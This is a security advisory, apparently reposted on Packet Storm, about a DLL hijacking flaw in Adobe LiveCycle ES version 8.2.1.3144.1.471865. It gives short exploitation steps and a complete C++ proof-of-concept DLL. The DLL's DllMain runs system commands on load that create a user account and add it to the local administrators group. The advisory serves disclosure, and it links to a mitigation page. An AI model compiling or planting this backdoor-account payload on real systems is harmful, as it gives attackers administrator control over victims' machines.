Adobe LifeCycle ES suffers from a DLL hijacking vulnerability. Version 8.2.1.3144.1.471865 is affected.
914e1a72e1c256b433639de5c3f194323f110b316851fca137768699e16c0a9b##########################www.BugReport.ir########################################
#
# AmnPardaz Security Research Team
#
# Title: Adobe LiveCycle ES DLL Hijacking Exploit (.dll)
# Vendor: http://www.adobe.com/products/livecycle/
# Vulnerable Version: 8.2.1.3144.1.471865
# Exploitation: Remote Code Execution
###################################################################################
####################
- Description:
####################
Adobe® LiveCycle® Enterprise Suite (ES) software can help you extend
the value of existing back-end systems by enabling developers to build
and deploy applications quickly and easily, and by empowering business
users to manage application environments based on their specific needs.
With Adobe LiveCycle ES, you can make it easier for people to interact
with information through intuitive user experiences, improve
efficiencies through business process automation, and enhance customer
service through personalized communications management.
####################
- Vulnerability:
####################
+--> DLL Hijacking
Compile the exploit and rename to .dll, create a file in the same dir
with *.tds extension.
(Vulnerability is discovered by DLLHijackAuditKit v2)
####################
- Exploits/PoCs:
####################
//tested on Windows XP SP3
#include "stdafx.h"
#include "windows.h"
#include <cstdlib>
int main()
{
system("net user apuser appass /add");
system("net localgroup administrators apuser /add");
exit(0);
return 0;
}
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
main();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
####################
- Solution:
####################
http://blogs.technet.com/b/srd/archive/2010/08/23/more-information-about-dll-preloading-remote-attack-vector.aspx
####################
- Original Advisory:
####################
http://www.bugreport.ir/index_74.htm
####################
- Credit:
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.com
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed